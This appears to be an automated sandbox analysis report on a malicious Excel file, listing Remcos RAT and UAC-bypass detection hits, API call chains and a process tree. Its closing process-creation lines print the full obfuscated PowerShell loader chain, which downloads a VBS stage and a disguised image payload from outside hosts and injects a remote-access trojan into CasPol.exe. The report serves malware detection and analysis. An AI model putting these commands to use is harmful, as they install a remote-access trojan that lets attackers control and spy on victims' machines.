                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhv5265.tmp.29.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@37/39@13/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,29_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,31_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,32_2_00416AB7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,29_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,29_2_00413D4C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,29_2_0040B58D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,32_2_00419BC4
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CC430000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-Z4DJFI
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA8AD.tmpJump to behavior
                  Source: 0200011080.xlsOLE indicator, Workbook stream: true
                  Source: CC430000.0.drOLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3........................{.............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................3..k....}..w......{.....\.......................(.P.....x...............h...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w.............<^........k......].....(.P.....x...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................3..k....}..w......{.....\.......................(.P.....x...............h...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w.............<^........k......].....(.P.....x...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..<^........k......].....(.P.....x....................... .......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w.............<^........k......].....(.P.....x...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....x.......................8.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w.............<^........k......].....(.P.....x...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w.............<^........k......].....(.P.....x.......................l.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .........{.....}..w.............<^........k......].....(.P.....x...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................{.............0..VT....Wl.....}..w....h.......@E......^...............(.P.....x...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................{.................T....Wl.....}..w....h.......@E......^...............(.P.....x...............................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....`.......................`.......h........................3......................`...............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................q..............
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....q......\.......................(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................q......}..w............x.]........l.....s......(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....q......\.......................(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................q......}..w............x.]........l.....s......(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....h.......N.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.x.]........l.....s......(.P.....................h....... .......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................q......}..w............x.]........l.....s......(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....................h.......8.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................q......}..w............x.]........l.....s......(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........h.......F.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................q......}..w............x.]........l.....s......(.P.............................l.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........q......}..w............x.]........l.....s......(.P.....................h...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................q..............0.n@."...Wl.....}..w............@E......^...............(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................q..................."...Wl.....}..w............@E......^...............(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m..............................................................3......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.............L.......................................
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: 0200011080.xlsReversingLabs: Detection: 13%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_30-33246
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
